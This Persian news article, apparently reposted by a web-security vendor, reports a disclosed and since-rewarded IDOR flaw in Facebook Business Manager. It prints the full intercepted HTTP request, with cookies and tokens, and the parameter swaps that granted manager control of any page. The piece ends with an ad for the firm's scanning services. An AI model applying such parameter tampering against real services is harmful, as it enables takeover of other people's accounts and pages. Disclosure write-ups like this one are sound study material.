نفوذ به صفحات فیسبوک توسط یک محقق هندی

۱۸۷۰یک محقق هندی با نام آرون سورشکومار به تازگی یک آسیب‌پذیری خطرناک را در بخش مدیریت تجارت۱ فیسبوک کشف کرده که می‌توان با بهره‌برداری از آن، هر صفحه‌ای را در این شبکه اجتماعی مورد نفوذ قرار داد.

مدیریت تجارت یکی از بخش‌های فیسبوک است که به تجارت‌های مختلف این امکان را می‌دهد که برخی دیگر از بخش‌های فیسبوک مانند صفحات و حساب‌های تبلیغاتی دسترسی کنترلی داشته و آن‌ها را به اشتراک بگذارند. این بخش علاوه بر این به مدیران این امکان را می‌دهد که بدون داشتن ارتباط با همکاران، دسترسی به این صفحات و حساب‌های تبلیغاتی را به اشتراک بگذارند.

با توجه به این مسائل، می‌توان درک بهتری از این بخش و همچنین تحقیقات سورشکومار داشت، اما قبل از آن ضروری است که در مورد مفهوم «ارجاع مستقیم ناامن به اشیاء۲» اطلاعاتی را کسب کرد.

طبق تعریف پروژه OWASP در این خصوص، این ارجاع هنگامی رخ می‌دهد که یک برنامه، دسترسی مستقیم به اشیاء را بر اساس ورودی‌های کاربران ممکن می‌سازد. نفوذگران نیز با استفاده از این آسیب‌پذیری می‌توانند از بخش احراز هویت عبور کرده و به‌صورت مستقیم به منابع در سامانه دسترسی داشته باشند.

در توضیح OWASP در این خصوص آمده است: «ارجاعات مستقیم ناامن به اشیاء به نفوذگران امکان گذر از احراز هویت را می‌دهند. این نفوذگران می‌توانند با تغییر مقدار پارامتر مورد استفاده برای اشاره به یک شیء، به‌صورت مستقیم به منابع دسترسی داشته باشند. نمونه‌های این منابع، موجودیت‌های پایگاه داده مربوط به دیگر کاربران، پرونده‌های موجود در سامانه هستند. به‌واسطه این امکان برای نفوذگران با توجه به این مهم فراهم می‌شود که برنامه ورودی کاربر را می‌گیرد و بدون بررسی‌های احراز هویت کافی، از این ورودی برای دسترسی به شی‌ء استفاده می‌کند.»

سورشکومار از آسیب‌پذیری IDOR در مدیر تجارت فیسبوک استفاده کرد. آسیب‌پذیری مذکور به وی اجازه داد تا هر صفحه‌ای را در فیسبوک در کمتر از ۱۰ ثانیه به کنترل خود درآورد.

سورشکومار با استفاده از حساب تجاری خود در فیسبوک با شناسه ۹۰۷۹۷۰۵۵۵۹۸۱۵۲۴، یک شریک را به این حساب اضافه کرد. وی برای این منظور یک حساب با شناسه ۹۹۱۰۷۹۸۷۰۹۷۵۷۸۸ انتخاب کرد. وی سپس با استفاده از ابزار Burp Suite، درخواست را دریافت کرد. این ابزار به وی امکان تغییر درخواست را تغییر داد.

در زیر درخواست ایجاد شده توسط او را مشاهده می‌کنید:

POST /business_share/asset_to_agency/?dpr=۲ HTTP/۱.۱

Host: business.facebook.com

Connection: close

Content-Length: ۴۳۶

Origin: https://business.facebook.com

User-Agent: Mozilla/۵.۰ (Macintosh; Intel Mac OS X ۱۰_۱۱_۶) AppleWebKit/۵۳۷.۳۶ (KHTML, like Gecko) Chrome/۵۲.۰.۲۷۴۳.۱۱۶ Safari/۵۳۷.۳۶

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://business.facebook.com/settings/pages/۵۳۶۱۹۵۳۹۳۱۹۹۰۷۵?business_id…

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=۰.۸

Cookie: rc=۲; datr=AWE۳V–DUGNTOAy۰wTGmpAXb; locale=en_GB; sb=BWE۳V۱vCnlxJF۸۷yY۹a۸WWjP; pl=n; lu=gh۲GPBnmZY۱B۱j_۷J۰Zi۳nAA;

c_user=۱۰۰۰۰۰۷۷۱۶۸۰۶۹۴;

xs=۲۵%۳A۵C۶rNSCaCX۹۲MA%۳A۲%۳A۱۴۷۲۴۰۲۳۲۷%۳A۴۸۳۷;

fr=۰۵UM۸RW۰tTkDVgbSW.AWUB۴pn۰DvP۱fQoqywWeORlj_LE.BXN۲EF.IL.FfD.۰.۰.BXxBSo.AWXdKm۲I;

csm=۲;

s=Aa۵۰vjfSfyFHHmC۱.BXwxOY;

_ga=GA۱.۲.۱۷۷۳۹۴۸۰۷۳.۱۴۶۴۶۶۸۶۶۷;

p=-۲;

presence=EDvF۳EtimeF۱۴۷۲۴۶۹۲۱۵EuserFA۲۱B۰۰۷۷۱۶۸۰۶۹۴A۲EstateFDutF۱۴۷۲۴۶۹۲۱۵۰۵۱CEchFDp_۵f۱B۰۰۷۷۱۶۸۰۶۹۴F۷CC;

act=۱۴۷۲۴۶۹۲۳۳۴۵۸%۲F۶

parent_business_id=۹۰۷۹۷۰۵۵۵۹۸۱۵۲۴&agency_id=۹۹۱۰۷۹۸۷۰۹۷۵۷۸۸&asset_id=

۵۳۶۱۹۵۳۹۳۱۹۹۰۷۵&role=MANAGER&__user=۱۰۰۰۰۰۷۷۱۶۸۰۶۹۴&__a=۱&__dyn=aKU-XxaAcoaucCJDzopz۸aWKFbGEW۸UhrWqw-xG۲G۴aK۲i۸zFE۸oqCwkoSEvmbgcFV۸SmqVUzxeUW۴ohAxWdwSDBzovU-

eBCy۸b۴۸xicx۲aGewzwEx۲qEN۴yECcKbBy۹onwFwHCBxungXKdAw&__req=e&__be=-۱&__pc=

PHASED%۳Abrands_pkg&fb_dtsg=AQHoLGh۱HUmf%۳AAQGT۴fDF۱-nQ&ttstamp=

۲۶۵۸۱۷۲۱۱۱۷۶۷۱۱۰۴۴۹۷۲۸۵۱۰۹۱۰۲۵۸۶۵۸۱۷۱۸۴۵۲۱۰۲۶۸۷۰۴۹۴۵۱۱۰۸۱&__rev=۲۵۳۰۷۳۳

او مقدار «asset id» را با مقدار صفحه هدف تغییر داد. وی هم‌چنین مقادیر «parent_business_id» و «agency_id» را با هم عوض کرده و مقدار عبارت role را نیز به «MANAGER» تغییر داد.

parent_business_id= ۹۹۱۰۷۹۸۷۰۹۷۵۷۸۸

agency_id= ۹۰۷۹۷۰۵۵۵۹۸۱۵۲۴

asset_id =۱۹۰۳۱۳۴۶۱۳۸۱۰۲۲

role= MANAGER

این محقق هندی در این فرآیند توانست ثابت کند که نفوذ به صفحات فیسبوک ممکن است. وی در این فرآیند اختیارات مدیریتی را در صفحه تجاری به‌دست آورد.

سورشکومار در ۲۹ آگوست ۲۰۱۶ آسیب‌پذیری مذکور را به فیسبوک اطلاع داد. فیسبوک نیز با بررسی این اشکال، متوجه وجود یک اشکال دیگر در بستر خود شد. این غول شبکه اجتماعی مبلغ ۱۶ هزار دلار را به عنوان بخشی از برنامه اشکال‌یابی خود به سورشکومار اهدا کرد.

۱. Business manager
۲. Insecure Direct Object Reference

منبع: asis

درباره نماد امنیت وب

“نماد امنیت وب” به عنوان یکی از شرکت های پیشتاز در زمینه امنیت نرم افزار و سرویس های تحت وب، با ارائه سرویس های امنیتی برای تمامی کسب و کار ها و دارای نمایندگی شرکت Acunetix (اکوانتیکس) بعنوان محبوب ترین اسکنر امنیتی black box در دنیا، ایمنی وب سایت شما را در مقابل حمله هکر ها تضمین می کند.

اسکن امنیتی وب سایت
(5000 تومان)

نوع وب سایت: وبلاگ، شرکتی، تجارت الکترونیک و کسب و کارحرفه ای
آسیب پذیری های OWASP (شامل بررسی 10 آسیب پذیری متداول)
اسکن نرم افزار/وب سایت توسط Acunetix نسخه 11
اسکن تمامی پورت ها با ابزار Nmap
اسکن وب سرور و پیکربندی آن توسط ابزار Nikto
اسکن تزریق توسط نرم افزار قدرتمند SQLmap